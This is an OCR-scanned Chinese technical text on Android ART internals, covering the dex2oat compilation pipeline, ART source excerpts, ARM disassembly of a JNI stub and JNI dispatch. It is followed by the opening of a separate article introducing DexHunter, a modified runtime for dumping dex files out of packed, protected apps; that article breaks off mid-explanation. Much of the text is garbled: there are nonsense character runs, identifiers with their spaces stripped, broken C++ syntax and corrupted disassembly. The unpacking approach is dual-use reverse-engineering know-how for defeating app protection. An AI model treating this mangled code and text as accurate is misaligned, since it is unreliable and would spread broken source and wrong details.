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第 二 阶段 主要 是 进入 编译 器 的 处 理 流 程 ， 通 过 对 dalvik 指 令 进行 一 次 编译 为 MIR， 然 后 二 次 纺 
译 为 LIR， 最 后 编译 成 ARM 指 令 。 


下 面 择 要 对 关键 代码 进行 整理 : 


staticintdex2oat(intargc, char** argv){ 
UniquePtr«constCompilerDriver»compiler(dex20at-»CreateOatFile(boot image option, 
host prefix.get(), 

android root, 

is host, 

dex files, 

oat file.get(), 

bitcode filename, 

image, 

image classes, 

dump stats, 

timings)); 


在 这 个 函数 的 调用 中 ， 主 要 进行 的 多 线程 进行 编译 


voidCompilerDriver::CompileAll(jobjectclass loader, 
conststd::vector«constDexFile*»-&dex files, 
base: :TimingLogger&timings) 


Compile(class loader, dex files, *thread pool.get(), timings); 


voidCompilerDriver::Compile(jobjectclass loader, 
conststd::vector«constDexFile*»-&dex files, 
ThreadPool&thread pool, base::TimingLogger&timings) { 


CompileDexFile(class loader, *dex file, thread pool, timings); 


一 直到 


voidCompilerDriver::CompileDexFile(jobjectclass loader, 
constDexFile&dex file,ThreadPool&thread pool, 
base::TimingLogger&timings) { 

context.ForAll(0, dex file.NumClassDefs(), 
CompilerDriver::CompileClass, thread count ); 


voidCompilerDriver: :CompileClass(constParallelCompilationManager* manager, size_tclass 
_def_index) ( 
ClassDataItemIteratorit(dex file, class data); 
CompilerDriver* driver = manager-»GetCompiler(); 
int64 tprevious direct method idx = -1; 
while (it.HasNextDirectMethod()) { 
uint32 tmethod idx - it.GetMemberIndex(); 
if (method idx == previous direct method idx) { 
it.Next(); 
continue; 
} 
previous_direct_method_idx = method_idx; 
driver ->CompileMethod(it.GetMethodCodeItem(), 
it .GetMemberAccessFlags(), 
it.GetMethodInvokeType(class_def),class_def_index, 
method_idx, jclass_loader, dex_file, 
dex to dex compilation level); 
it.Next(); 
} 
int64 tprevious virtual method idx = -1; 
while (it.HasNextVirtualMethod()) { 
uint32 tmethod idx - it.GetMemberIndex(); 
if (method idx == previous virtual method idx) { 
it.Next(); 
continue; 
} 
previous_virtual_method_idx = method_idx; 
driver ->CompileMethod(it.GetMethodCodeItem(), 
it .GetMemberAccessFlags(), 
it.GetMethodInvokeType(class_def), class_def_index, 
method_idx, jclass_loader, dex_file, 
dex to dex compilation level); 
it.Next(); 
} 











enone 斗 读 取 class 中 的 数据 ， 利 用 和 迭代 器 SUCUERHDAGCOMORIGUQevItISIMSIROG , 
后 分 别 对 每 个 Method 作 为 单元 利用 CompilerDriver::CompileMethod 进 行 编译 。 


CompilerDriver::CompileMethod & 4 3- % zx 71 A 


了 CompilerDriver::CompilerDriver* constcompiler_ 这 个 成 员 变 变量 ( 函数 指针 ) © 
这 个 变量 是 在 CompilerDriver 的 构造 函数 中 初始 化 的 ， a 同 的 编译 器 后 端 选择 不 同 的 实 
现 ， 不 过 基本 上 的 流程 都 是 一 样 的 ， 通 过 对 Portable 后 端的 分 析 ， 可 以 看 到 最 后 调用 的 是 


static CompiledMethod* CompileMethod 4 Z ° 


staticCompiledMethod* CompileMethod(CompilerDriver&compiler, 
constCompilerBackendcompiler_backend, 
constDexFile::CodeItem* code item, 
uint32 taccess flags, InvokeTypeinvoke type, 
uinti16 tclass def idx, uint32 tmethod idx, 
jobjectclass loader, constDexFile&dex file 
Zifdefined(ART USE PORTABLE COMPILER) 
, llvm::LlvmCompilationUnit* llvm compilation unit 
#endif 


cu.mir_graph.reset(newMIRGraph(&cu, &cu.arena)); 

cu.mir_graph->InlineMethod(code_item, access_flags, invoke_type, class_def_idx, me 
thod_idx,class_loader, dex_file); 

cu.mir graph-»CodeLayout(); 

cu.mir graph-»SSATransformation(); 

cu.mir graph-»PropagateConstants(); 

cu.mir_graph->MethodUseCount(); 

cu.mir_graph->NullCheckElimination(); 

cu.mir_graph->BasicBlockCombine( ); 

cu.mir_graph->BasicBlockOptimization(); 

cu.cg.reset(ArmCodeGenerator(&cu, cu.mir graph.get(), &cu.arena)); 

cu.cg->Materialize(); 

result = cu.cg-»GetCompiledMethod(); 

returnresult; 


在 这 个 过 程 中 牵涉 了 几 种 重要 的 数据 结构 : 


classMIRGraph { 
BasicBlock* entry_block_; 
BasicBlock* exit_block_; 
BasicBlock* cur_block_; 
intnum_blocks_; 


MIR* first_mir_insn; 

MIR* last_mir_insn; 

BasicBlock* fall_through; 

BasicBlock* taken; 

BasicBlock* i_dom; // Immediate dominator. 


structMIR { 
DecodedInstructiondalvikInsn; 


MIR* prev; 


structDecodedInstruction { 
uint32 tvA; 
uint32 tvB; 


uint64 tvB wide; ee Tole ks Tiis 
uint32 tvC; 
uint32 targ[5]; /* vC/D/E/F/G in invoke or filled-new-array 


Instruction: :Codeopcode; 


explicitDecodedInstruction(constInstruction* inst) { 
inst->Decode(vA, vB, vB wide, vC, arg); 
opcode = inst->Opcode(); 
} 
}; 


这 几 个 数据 结构 的 关系 如 图 所 示 : 


| dalvikinsn | 
| prev | 
| net | 
[ s | 

















BasicBlock 























| dalvikinsn | last mir insn | MiRGraph 
= 一 | [m] |__| 
next 





a mat ee. 












| BasicBlock | 
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简单 地 说 ， 一 个 MIRGraph 对 应 着 一 个 编译 单元 即 一 个 方法 ， 对 一 个 方法 进行 控制 流 分 析 ， 划 
分 出 BasicBlock， 并 在 BasicBlock 中 的 fall_through 和 taken 域 中 指向 下 一 个 BasicBlock (适用 
于 分 支出 口 ) 。 每 一 个 BasicBlock 包 含 若干 dalvik 指 令 ， 每 一 天 dalvik 指 令 被 翻译 为 若干 MIR 语 
各， 这些 MIR 结 构 体 之 间 形 成 双向 链表 。 每 一 个 BasicBlock 也 指示 了 第 一 条 和 最 后 一 条 MIR 语 
4o 


InlineMethod HA 3- 3e 3 Ayr — 4» 7r iX > 3EX| 2 BasicBlock3& A » 4&6 A X fa] Bate 
BasicBlock 和 连接 成 一 个 链表 ， 利 用 fall through 指示 。 

在 CodeLayout 函 数 中 具体 地 再 次 遍历 BasicBlock 链 表 ， 并 根据 每 个 BasicBlock 出 口 的 指令 ， 
再 次 调整 taken 域 和 fall_through 域 ， 形 成 完整 的 控制 流 图 结构 。 
SSATransformation 辑 数 是 对 每 条 指令 进行 静态 单 赋值 变换 。 先 对 控制 流 图 进行 深度 优先 遍 
历 ， 并 计算 出 BasicBlock 之 间 的 支配 关系 ， 插 入 Phi 有 函数 ， 并 对 变量 进行 命名 更 新 。 

其 余 的 方法 主要 是 一 些 代码 优化 过 程 ， 例 如 常量 传播 、 消 除 空 指针 检查 ; 并 在 BasicBlock 组 合 
之 后 再 进行 BasicBlock 的 优化 ， 消 除 宛 余 指令 。 

这 样 基 本 上 就 完成 了 MIR 的 生成 过 程 ， 在 某 种 程度 上 ， 可 以 认为 MIR 即 为 对 dalvik 指 令 进 行 
SSA 变 换 之 后 的 指令 形态 。 

接着 就 调用 cu.cg->Materialize() 用 来 产生 最 终 代 码 。cu.cg 在 之 前 的 代码 被 指向 了 Mir2Lir 对 
象 ， 所 以 调用 的 是 : 


voidMir2Lir::Materialize() { 
CompilerInitializeRegAlloc(); // Needs to happen after SSA naming 
/* Allocate Registers using simple local allocation scheme */ 


SimpleRegAlloc(); 


/* Convert MIR to LIR, etc. */ 
if (first lir insn == NULL) ( 
MethodMIR2LIR(); 


* / 


/* Method is not empty */ 
if (first lir insn ) { 
// mark the targets of switch statement case labels 


ProcessSwitchTables(); 


/* Convert LIR into machine code. */ 


AssembleLIR(); 


其 中 重要 的 两 个 调用 就 是 MethodMIR2LIR() 和 AssembleLIR()。 


MethodMIR2LIR 将 MIR 转 化 为 LIR， 遍 历 每 个 BasicBlock， 对 每 个 基本 块 执行 
MethodBlockCodeGen， 本质 上 最 后 是 执行 了 compileDalvikInstruction ° 


voidMir2Lir::CompileDalvikInstruction(MIR* mir, BasicBlock* bb, LIR* label list) { 
Instruction::Codeopcode = mir->dalvikInsn.opcode; 

intopt flags = mir-»optimization flags; 

uint32 tvB = mir->dalvikInsn.vB; 

uint32 tvC = mir->dalvikInsn.vC; 


switch (opcode) ( 


case XXX: 

GenXXXXXX( ......) 

default: 

LOG(FATAL) ««"Unexpected opcode: "««opcode; 
} 

} 


也 就 是 通过 解析 指令 ， 然 后 根据 opcode 进 行 分 支 判断 ， 调 用 最 终 不 同 的 指令 生成 函数 。 
将 LIR 之 间 也 形成 一 个 双向 链表 。 


AssembleLIR 最 终 调 用 的 是 Assemblelnstructions 元 数 。 程 序 中 维护 了 一 个 编码 指令 表 


ArmMir2Lir::EncodingMap，Assemblelnstructions 即 是 通过 查找 这 个 表 来 进行 翻译 ， 将 LIR 转 


化 为 了 ARM 指 令 ， 并 将 所 翻译 的 指令 存储 到 CodeBufferMir2Lir::codebuffer 之 中 。 


这 样 就 完成 了 一 次 编译 的 完整 流程 。 


0x05 JNI 分 析 


ART 环 境 中 的 JNI 接 口 与 Dalvik 同 样 符合 JVM 标 准 ， 但 是 其 中 的 实现 却 有 所 不 同 。 以 下 通过 三 


个 过 程 来 进行 简 述 。 


1、 类 加 载 初始 化 


首先 观察 一 个 native 的 java 成 员 方法 通过 dex20at 编 译 后 的 结果 : 


java.lang.Stringcom.example.hellojni.HelloJni.stringFromJNI() (dex_method_idx=9) 


DEX CODE: 

CODE: Oxb6bfdiac (offset=0x000011ac size-148)... 
Oxb6bfdiac: e92d4deO stmdbsp!, {r5, r6, r7, 
Oxb6bfd1b0: e24dd024 sub sp, sp, #36 
Oxbebfdib4: e58d0000 str ro, [sp, #0] 
Oxbebfdib8: e58d1044 str ri, [sp, #68] 
Oxb6bfdibc: e3a0c001 mov r12, rO, #1 
Oxb6bfd1c0: e58dc004 str r12, [sp, #4] 
Oxbebfdic4: e599c074 ldr r12, [r9, #116] 
Oxb6bfdic8: e58dc008 str r12, [sp, #8] 
Oxb6bfdicc: e28dc004 add r12, sp, #4 
Oxb6bfdid0: e589c074 str r12, [r9, #116] 
Oxbebfdid4: e59dc044 ldr r12, [sp, #68] 
Oxb6bfdid8: e58dcOO0c str r12, [sp, #12] 
Oxbebfdidc: e589dO1c strsp, [r9, #28] ; 28 
Oxbebfdi1e0: e3a0c000 mov r12, rO, #0 
Oxbebfdie4: e589c020 str ri2, [r9, #32] 
Oxb6bfdie8: e1a00009 mov ro, r9 
Oxb6bfdiec: e590ci1b8 ldr r12, 

dStart 
OxbebfdifO: ei2fff3c blx r12 
Oxbebfdif4: e58d0010 str rO, [sp, #16] 
Oxbebfdif8: e28d100c add ri, sp, #12 
Oxb6bfdifc: e5990024 ldr ro, [r9, #36] 
Oxb6bfd200: e59dc000 ldr r12, [sp, #0] 
Oxb6bfd204: e59cc048 ldr r12, [r12, #72] 
Oxb6bfd208: e12fff3c blx r12 
Oxb6bfd20c: e59d1010 ldr ri, [sp, #16] 
Oxb6bfd210: e1a02009 mov r2, r9 
Oxb6bfd214: e592cic8 ldr r12, [r2, #456] 
Oxb6bfd218: e12fff3c blx 

WithReference 
Oxb6bfd21c: e599c00c ldr ri2, [r9, #12] 
Oxb6bfd220: e35c0000 cmp r12, #0 
Oxb6bfd224: 1a000001 bne +4 (Oxb6bfd230) 
Oxb6bfd228: e28ddO3c add sp, sp, #60 
Oxb6bfd22c: e8bd8000  ldmiasp!, {pc} 
Oxb6bfd230: e1a0000c mov rO, r12 
Oxb6bfd234: e599c260 ldr r12, [r9, #608] 
Oxb6bfd238: e12fff3c blx r12 
Oxb6bfd23c: e1200070 bkpt #0 


可 以 看 到 ， 它 没有 对 应 的 dex code » 


用 伪 码 表示 这 个 过 程 : 


JniMethodStart(Thread*); 
ArtMethod ::native method (....); 
JniMethodEndWithReference(....); 
return; 


基本 上 就 是 这 三 个 函数 的 调用 。 


r8, 


[ro, #440] //qpoints->pJniMethodStart = 


alo}; Teal Abie} 


;top sirt 


;top sirt 


7032 


JniMetho 


;jni env. 


// const void* ArtMethod::native method 


r12//qpoints->pJniMethodEndwithReference= JniMethodEnd 


; exception 


;pDeliverException 


但 是 从 ART 的 LoadClass 的 函数 来 分 析 ，ArtMethod 对 象 与 丨 实 执 行 的 代码 链接 的 过 程 主要 是 
通过 LinkCode 蕊 数 执行 的 。 


staticvoidLinkCode(SirtRef<mirror::ArtMethod>&method, constOatFile::OatClass* oat clas 
S, 
uint32_tmethod_index) 

SHARED_LOCKS_REQUIRED(Locks::mutator_lock_) { 
DCHECK(method->GetEntryPointFromCompiledCode() == NULL); 
constOatFile::OatMethodoat method = oat_class->GetOatMethod(method_index) ; 
oat_method.LinkMethod(method.get()); 


Runtime* runtime = Runtime: :Current(); 

boolenter_interpreter = NeedsInterpreter(method.get(), method->GetEntryPointFromCompil 
edCode()); 

if (enter interpreter) ( method-»SetEntryPointFromInterpreter(interpreter::artInterpr 
eterToInterpreterBridge); 

) eise( method-»SetEntryPointFromInterpreter(artInterpreterToCompiledCodeBridge); 


j 


if (method->IsAbstract()) { method-»SetEntryPointFromCompiledCode(GetCompiledCodeToInt 
erpreterBridge()); 
return; 


} 


if (method->IsStatic() && !method->IsConstructor()) { 
method->SetEntryPointFromCompiledCode(GetResolutionTrampoline(runtime->GetClassLinker( 


))); 
) elseif (enter interpreter) { 
method-»SetEntryPointFromCompiledCode(GetCompiledCodeToInterpreterBridge()); 


} 


if (method->IsNative()) { 
method->UnregisterNative(Thread: :Current()); 


} 


runtime->GetInstrumentation() ->UpdateMethodsCode(method.get(), 
method->GetEntryPointFromCompiledCode()); 


} 


可 以 看 到 ， 在 LinkCode 的 开始 就 将 通过 oat_method.LinkMethod(method.get()) 将 对 象 与 代码 
进行 了 链接 ， 但 是 在 后 边 又 针对 几 种 特殊 情况 做 了 一 些 处 理 ， 包 括 解释 执行 入 口 和 静态 方法 
等 等 。 我 们 主要 关注 的 是 JNI 方 法 ， 即 


if (method->IsNative()) { 
method->UnregisterNative(Thread: :Current()); 


} 


EFAA : 


voidArtMethod: :UnregisterNative(Thread* self) ( 
CHECK(IsNative()) <<PrettyMethod(this); 
RegisterNative(self, GetJniDlsymLookupStub()); 








} 

extern"C"void* art jni dlsym lookup stub(JNIEnv*, jobject); 
staticinlinevoid* GetJniDlsymLookupStub() { 
returnreinterpret cast«void*-(art jni dlsym lookup stub); 

} 


voidArtMethod: :RegisterNative(Thread* self, constvoid* native method) { 
DCHECK(Thread::Current() -- self); 

CHECK(IsNative()) ««PrettyMethod(this); 

CHECK(native method != NULL) ««PrettyMethod(this); 

if (!self-»GetJniEnv()-»vm-»work around app jni bugs) { 
SetNativeMethod(native method); 

} else { 
SetNativeMethod(reinterpret_cast<void*>(art_work_around_app_jni_bugs) ); 
SetFieldPtr<constuint8_t*>(OFFSET_OF_OBJECT_MEMBER(ArtMethod, gc_map_), 
reinterpret_cast<constuint8_t*>(native_method), false); 

} 

} 


voidArtMethod::SetNativeMethod(constvoid* native method) { 
SetFieldPtr<constvoid*>(OFFSET_OF_OBJECT_MEMBER(ArtMethod, native_method_), 
native_method, false); 


} 








很 清晰 可 以 看 到 ， 在 类 加 载 的 时 候 是 把 ArtMethod 的 nativemethoq 成 员 设 置 为 了 
art_jni_dlsym_lookup_stub 有 函数 ， 那 么 在 执行 JNI 方 法 的 时 候 就 会 执行 
art_jni_dlsym_lookup_stub 有 函数 。 


2、 通 过 java 调 用 JNI 方 法 


从 art_jni_dlsym_lookup_stub 骂 数 入 手 ， 这 个 函数 使 用 汇编 写 的 ， 与 具体 的 平台 相关 。 


ENTRYart jni dlsym lookup stub 
push fmol, nd Tee p 3r eS Q spillregs 
.save (r0, r1, r2, r3, Ir} 
.pad £20 
.cfi adjust cfa offset20 
subsp, #12 @ padstackpointertoalignframe 
.pad £12 
.cfi adjust cfa offset12 
blxartFindNativeMethod 





movri2, rO Q saveresultinr12 
addsp, £12 @ restorestackpointer 
.cfi adjust cfa offset -12 
cbzrO, 1f Q ismethodcodenull? 
pop (i50 2117952 Isle alte} Q restoreregs 
.cfi adjust cfa offset -20 
bxr12 Q ifnon-null, tailcalltomethod's code 
abs 
.cfi adjust cfa offset 20 
pop inopi 2 Tesi, [eet Q restore regs and return to caller to handle ex 
ception 


.cfi adjust cfa offset -20 
END art jni dlsym lookup stub 





£20 3E 3ANarFindNativeMethod4T 2) Ś Œ 87 native code 的 地 址 ， 然 后 在 跳 转 到 相 
应 地 址 去 执行 ， 即 对 应 了 


blxartFindNativeMethod 
bxr12 Q ifnon-null, tailcalltomethod's code 


两 条 指令 。 


extern"C"void* artFindNativeMethod() { 
Thread* self = Thread::Current(); 

Locks: :mutator_lock_->AssertNotHeld(self); 
ScopedObjectAccesssoa(self); 


mirror::ArtMethod* method = self->GetCurrentMethod(NULL); 
DCHECK(method !- NULL); 


void* native code = soa.Vm()->FindCodeForNativeMethod(method) ; 
if (native code == NULL) { 
DCHECK(self-»-IsExceptionPending()); 
returnNULL; 
} else { 
method->RegisterNative(self, native_code); 
returnnative_code; 


} 
} 


主要 的 过 程 也 就 是 查找 到 相应 方法 的 native code， 然 后 再 次 设置 A 人 rtMethod 的 nativemethod 成 
员 ， 这 样 以 后 再 执行 的 时 候 就 直接 跳 到 了 native code 执 行 了 。 
3、Native 方 法 中 调用 java 方 法 


这 个 主要 是 通过 JNIEnv 来 间接 调用 的 。JNIEnv 中 维持 了 许多 JNI API 可 以 被 native code 来 使 
用 。C 和 C++ 的 实现 形式 略 有 不 同 ，C++ 是 对 C 的 事先 进行 了 一 个 简单 的 包装 ， 具 体 可 以 参见 
jni.h « 3x €. 7j f 4e T d att VAC 7] 45] » 


typedefconststructJNINativeInterface* JNIEnv; 
structJNINativeInterface { 


void* reserved0; 

void* reserved1; 

void* reserved2; 

void* reserved3; 

jint (*GetVersion)(JNIEnv *); 

jclass (*DefineClass)(JNIEnv*, constchar*, jobject, constjbyte*, jsize); 
jclass (*FindClass)(JNIEnv*, constchar*); 

jobject (*NewDirectByteBuffer)(JNIEnv*, void*, jlong); 
void* (*GetDirectBufferAddress)(JNIEnv*, jobject); 
jlong (*GetDirectBufferCapacity)(JNIEnv*, jobject); 
jobjectRefType (*GetObjectRefType)(JNIEnv*, jobject); 

u 


这 些 AP| 以 函数 指针 的 形式 存在 ， 并 在 libart.so 中 实现 ， 在 整个 art 的 初始 化 的 过 程 中 进行 了 对 


在 libart.so 中 的 对 应 : 


constJNINativelInterfacegJniNativeInterface = { 


NULL, // r 92 
NULL, // re: I 
Ue. ZA Ve 
NULL, // r 





JNI::GetVersion, 
JNI::DefineClass, 
JNI::FindClass, 


JNI::NewDirectByteBuffer, 
JNI::GetDirectBufferAddress, 
JNI::GetDirectBufferCapacity, 
JNI::GetObjectRefType, 


下 面 以 一 个 常见 的 native code 调 用 java 的 过 程 进行 下 分 析 : 


(*pEnv) -»FindClass(....); 
getMethodID(....); 
(*pEnv) ->CallVoidMethod(......); 


即 查找 类 ， 得 到 相应 的 方法 的 ID， 然 后 通过 此 ID 去 调用 。 


staticjclassFindClass(JNIEnv* env, constchar* name) { 
CHECK_NON_NULL_ARGUMENT(FindClass, name); 
Runtime* runtime = Runtime: :Current(); 
ClassLinker* class linker = runtime->GetClassLinker(); 
std::stringdescriptor(NormalizeJniClassDescriptor(name)); 
ScopedObjectAccesssoa(env); 
Class* c - NULL; 
if (runtime->IsStarted()) { 
ClassLoader* cl = GetClassLoader(soa); 

c = class_linker->FindClass(descriptor.c_str(), cl); 

} else { 
c = Class_linker->FindSystemClass(descriptor.c_str()); 


returnsoa.AddLocalReference<jclass>(c); 


} 


可 以 看 到 JNI 中 的 FindClass 实 际 调用 的 是 ClassLinker::FindClass， 这 与 ART 的 类 加 载 过 程 一 
致 。 


staticvoidCallVoidMethod(JNIEnv* env, jobjectobj, jmethodIDmid, ...) { 
va_listap; 

va_start(ap, mid); 

CHECK_NON_NULL_ARGUMENT(CallVoidMethod, obj); 
CHECK_NON_NULL_ARGUMENT(CallVoidMethod, mid); 
ScopedObjectAccesssoa(env); 

InvokeVirtualOrInterfaceWithVarArgs(soa, obj, mid, ap); 

va end(ap); 


最 后 调用 的 是 ArtMethod::Invoke() ° 


可 以 说 如 出 一 航 ， 即 JNI 的 这 些 API 其 实 还 是 做 了 一 遍 ART 的 类 加 载 和 初始 化 及 调用 的 过 程 。 


0x06 Š 5 i 7L 


. VUA 个 静态 库 的 形式 被 加 载 到 zygote 进 程 的 空间 中 ， 并 由 libart.so 负 责 虚 拟 机 的 

功能 ， a > 方法 的 查找 和 调用 ， 并 负责 垃圾 回收 。 

e runtime 可 以 实现 在 部 分 未 被 编译 的 方法 和 已 被 编译 的 方法 之 前 的 交互 调用 ， 为 此 runtime 
提供 了 诸如 artinterpreterTolnterpreterBridge、artinterpreterToCompiledCodeBridge 之 类 
的 函数 进行 衔接 。 

e 所 有 的 Java 方 法 在 编译 为 arm 指 令 后 都 符合 一 定 的 标准 。 由 于 是 在 runtime 中 运行 的 ， 所 
有 的 RO 寄存 器 代表 着 一 个 隐 含 的 参数 ， 指 令 当 前 的 ArtMethod 对 象 ，R1-R3 传 递 前 几 个 参 
数 (包括 this) ， 多 余 的 参数 依靠 堆栈 传递 。 

e 系统 的 启动 类 【〈 在 环境 变量 BOOTCLASSPATH 中 指定 ) 被 翻译 为 boot.oat，boot.art 包 含 
了 其 加 载 后 的 类 对 象 ， 启 动 时 以 直接 被 载 入 进程 空间 中 。 

© 同一 个 dex 文 件 中 的 方法 ， 载 入 的 时 候 会 被 直接 解析 到 ArtMethod 对 象 的 
dexcache resolved me 如 ods 成 员 中 ， 直 接 通 过 R0 寄 存 器 寻 址 。 而 系统 的 API 主 要 是 通过 
找到 代表 包含 API 的 对 象 Object 实 例 中 的 Class 域 ， 然 后 在 其 中 的 函数 表 中 查找 解决 的 ; 
Class 实 例 的 初始 化 ， 是 在 载 入 每 个 oat 文 件 解析 类 信息 时 建立 的 。 

。 一 些 关 键 的 系统 调用 ， 如 分 配对 象 等 ， 是 有 libart.so 来 提供 的 ， 并 且 与 平台 有 相关 性 ， 存 
放 在 每 个 Thread 对 象 的 quickentrypoints 域 中 。 

e dex2oat 在 两 个 时 间 被 执行 ， 一 是 apk 安 装 的 时 候 ， 二 是 在 调用 DexClassLoader 动 态 载 入 
dex 文 件 的 时 候 。 

e. 具体 的 说 编译 的 目标 指令 为 Thumb-2 指 令 集 ， 支 持 16 位 指令 和 32 位 指令 的 混合 执行 。 

。 在 编译 boot.art 和 boot.oat 文 件 时 ， 不 需要 其 他 的 支持 ， 但 是 在 编译 其 他 的 dex 文 件 时 需要 
在 虚拟 机 环境 中 载 入 上 述 文件 。 编 译 执行 的 过 程 也 需要 虚拟 机 环境 的 支持 ， 只 不 过 是 用 
于 编译 而 非 执行 ， 这 样 可 以 保证 编译 的 目标 文件 是 在 虚拟 机 环境 中 的 一 个 完整 的 映像 而 
不 会 出 现 寻 址 错误 等 。 

e 整个 编译 过 程 基本 上 是 依靠 dex2oat 来 加 载 CompilerDriver， 然 后 和 逐个 方法 来 进行 编译 。 

将 每 个 方法 划分 BasicBlock， 绘 制 MIRGraph (控制 流 图 ) ， 乏 个 翻译 为 以 dalvikbtecode 
的 SSA 形 式 为 基础 的 MIR， 然 后 将 MIR 解 析 为 LIR， 最 后 翻译 为 Thumb-2 指 令 ， 最 后 统一 
写 入 一 个 ELF 文 件 即 oat 文 件 。 


原文 by zyq0879 


0x01 前 言 


之 前 对 Android 的 两 个 运行 时 的 源码 做 了 一 些 研究 ， 又 加 上 如 火 如 茶 的 Android 加 固 服务 的 尖 
起 ， 便 产生 了 打造 一 个 用 于 脱 壳 的 运行 时 ， 于 是 便 有 了 DexHunter 的 诞生 ( 7. 

码 : https://github.com/zyq8709/DexHunter/ ) 。 今 天 ， 我 就 通过 这 篇 小 文 聊 聊 我 的 一 些 简 单 
的 思路 ， 供 大 家 参考 和 讨论 。 


0x02 相关 机 制 


首先 ， 先 来 看 一 看 Android 运 行 时 的 一 些 相 关机 制 ， 看 看 我 们 来 怎么 搞 。 


首当其冲 ， 要 脱 过 少不了 研究 一 下 Dex 文 件 的 格式 ， 这 一 点 Android 的 官方 文档 写 的 已 经 很 清 
晰 了 ， 我 这 里 就 简单 再 提 一 下 。 整 个 结构 便 如 图 1 所 示 : 
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图 1 Dex 文 件 结构 

其 实 就 是 分 区 段 存储 不 同 的 内 容 ， 在 头 部 里 有 指向 各 个 区 段 起 始 的 偏 移 值 。 当 然 我 们 最 关心 
的 就 是 class_defs 和 data 这 两 个 段 了 。 
class_defs 和 包含 了 所 有 的 类 ， 用 class_def item 来 描述 。 图 2 是 对 class_def item 展 开 的 一 个 示 
意图 : 


class_def item 






dmn 





dass data item 







encoded method 





code item 





drops.wooyun.org 


图 2 class def item 结构 

每 个 class_def item 指 向 一 个 class_data_item， 每 个 class_data_item 包含 了 一 个 class 的 数 

据 ， 每 个 方法 用 encoded_method 结 构 来 描述 ， 它 又 指向 了 一 个 code_item， 这 个 里 面 就 保存 
着 一 个 方法 的 所 有 指令 。 

对 于 ART 下 ， 安 装 后 的 dex 文 件 会 被 编译 为 0at 文 件 ， 这 个 oat 文 件 其 实 是 一 个 ELF 文 件 ， 图 3 是 
它 的 一 个 结构 : 
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图 3 OAT 文 件 结构 


其 中 可 以 看 到 oatdata 指 向 的 部 分 包含 了 原 有 的 Dex 文 件 ， 这 个 是 我 们 的 目标 。 当 然 oatexec 指 
向 了 编译 后 的 ARM 指 令 ， ee 暂时 来 说 没有 什么 卵 用 。 


0x03 四 个 时 机 

为 了 脱光 ， 我 们 要 建立 一 个 概念 ， 就 是 “时 机 ”。 对 于 非 虚 拟 机 党 ， 从 内 存 中 转 储 是 一 个 最 为 有 
效 和 统 用 的 技巧 ， 那 么 就 必须 要 找到 一 个 时 机 ， 保 证 内 存 中 的 数据 是 完全 正确 的 。 

在 Android 中 呢 ， 便 有 这 么 四 个 时 机 : 

打开 Dex 文 件 

就 是 把 APK 中 的 dex 文 件 提 取 并 做 cache， 那 么 最 终 打 开 的 其 实 是 odex 或 oat 文 件 ; 


加 载 Class 





运行 时 读 取 存 储 在 Dex 中 的 每 个 class， 并 用 来 填充 一 个 生成 的 Class 对 象 ， 其 中 包含 了 class 的 
所 有 成 员 ， 这 样 一 个 class 才 能 被 使 用 ; 图 4 表示 了 ART 和 DVM 下 的 Class 对 象 的 结构 
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图 4 Class 的 结构 
初始 化 Class 


如 果 一 个 class 有 static 块 ， 那 么 这 个 部 分 就 会 编译 为 类 的 初始 化 器 ， 具 体 看 说 就 是 方法 ， 在 
class 申 正 需要 被 使 用 的 时 候 就 会 执行 它 ， 当 然 ， 训 就 可 以 利用 它 来 做 许多 事情 ; 


调用 具体 的 方法 


不 用 多 说 ， 就 是 根据 生成 的 Class 对 象 查找 到 具体 的 代码 指令 并 执行 了 。 


0x04 两 种 加 载 


好 ， 那 我 们 怎么 做 呢 ? 很 简单 ， 我 们 就 从 类 的 加 载 开 始 。 


总 的 来 说 ， 有 两 种 可 以 加 载 类 的 方法 ， 一 个 是 显示 加 载 ， 主 要 用 于 反射 ， 就 是 通过 调用 
Class.forName() 或 ClassLoader.loadClass() 方 法 来 主动 加 载 一 个 类 ; 另 一 个 是 隐 式 加 载 ， 主 
要 是 通过 创建 第 一 个 class 的 实例 或 在 类 产生 前 访问 静态 成 员 时 发 生 。 这 些 操作 的 背后 在 运行 
时 中 是 有 相应 的 函数 来 申 正 完成 的 。 


在 ART 中 : 

显 式 加 载 : 

ClassLoader.loadClass 对 应 DexFile_defineClassNative 
Class.forName 对 应 Class_classForName 

隐 式 加 载 : 


对 应 artAllocObjectFromCode 


图 5 表述 了 这 个 关系 : 
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图 5 ART 中 的 实现 
在 DVM 中 : 
显 式 加 载 : 
ClassLoader.loadClass 对 应 Dalvik_dalvik_system_DexFile_defineClassNative 
Class.forName 对 应 Dalvik_java_lang_Class_classForName 
隐 式 加 载 : 
对 应 dvmResolveClass 


图 6 是 DVM 中 的 实现 表示 : 


Dalvik_java_lang_ 
Class_classForName 


和 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 TIndirecty 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 


dvmLookup 
dvmDefine indClassNo ， 
Class Init 
foadClass 
FromDex 








indClass 
FromLoader 
Nolnit 














Dalvik dalvik systen- 
DexFile defineClassNa 
tive 









图 6 DVM 中 的 实现 


0x05 开始 修改 


很 清晰 看 到 ， 我 们 找到 了 关键 点 ， 在 ART 中 是 DefineClass，DVM 中 是 
Dalvik dalvik_system_DexFile_defineClassNative， 我 们 就 从 这 里 动手 ， 主 要 的 修改 就 发 生 
在 这 里 。 简 单 地 说 就 是 主动 地 一 次 性 加 载 并 初始 化 所 有 的 类 。 


这 样 做 是 隐 含 了 几 条 原则 的 : 
当 类 被 加 载 时 ，dex 中 对 应 的 部 分 必须 有 效 ; 
类 初始 化 的 时 候 ，dex 中 的 内 容 包括 生成 的 Class 对 象 是 可 以 被 修改 的 ; 


只 有 在 执行 一 个 方法 时 ， 才 要 求 code_item 是 有 效 的 。 
图 7 就 是 DexHunter 的 一 个 工作 流程 : 
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图 7 DexHunter/$ #2 

下 面 就 分 这 几 个 步骤 来 说 : 

(1) 定位 内 存 

对 于 之 前 提 到 的 入 口 函 数 ， 都 有 一 个 参数 表示 在 操作 的 文件 。 


ART 中 ， 这 个 参数 是 DexFile 对 象 ， 其 中 有 一 个 location_ 成 员 ， 是 一 个 字符 串 ， 可 以 简单 的 理 
解 为 此 文件 的 路 径 。 那 么 DVM 中 是 DexOrJar， 相 对 的 字符 串 成 员 是 fleName。 这 下 我 们 就 好 
整 了 ， 只 要 我 们 指定 了 目标 字符 串 ， 我 们 就 可 以 从 可 能 使 用 的 众多 dex 文 件 中 找 出 我 们 想 要 的 
